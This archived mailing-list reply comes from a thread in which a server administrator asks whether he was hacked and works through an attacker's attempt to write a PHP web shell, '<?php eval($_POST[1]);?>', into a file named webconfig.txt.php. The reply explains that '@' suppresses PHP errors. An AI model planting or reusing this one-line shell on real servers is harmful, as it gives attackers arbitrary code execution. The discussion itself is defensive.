Re: am i hacked ?

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



> OK. I think i understand most of it.
> First the attacker sets some values appropriate for him. Then he tries to create
> a file webconfig.txt.php and to write
> <?php eval($_POST[1]);?> in it.
> Fortunately wwwrun can't write in /sr/www ... , following
> http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago.
> If he could create the file, then he is able to sent arbitrary stuff to it which
> is executed by eval.
> 
> Some things are still unclear for me:
> 
> What is the purpose of the two echos ?
> Why has the request status code 200 ?
> What is the purpose of the 1 direct behind the question mark ?
> What is the 1 in the array $_POST ? Arrays start with index 0, i think (i'm not
> a php developer).
> 

The @ in front of the function calls silence the errors:
http://stackoverflow.com/questions/27645422/what-difference-does-usage-of-symbol-with-ini-set-built-in-function-makes-in

Bernd
 

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx




[Index of Archives]     [Open SSH Users]     [Linux ACPI]     [Linux Kernel]     [Linux Laptop]     [Kernel Newbies]     [Security]     [Netfilter]     [Bugtraq]     [Squid]     [Yosemite News]     [MIPS Linux]     [ARM Linux]     [Linux Security]     [Linux RAID]     [Samba]     [Video 4 Linux]     [Device Mapper]

  Powered by Linux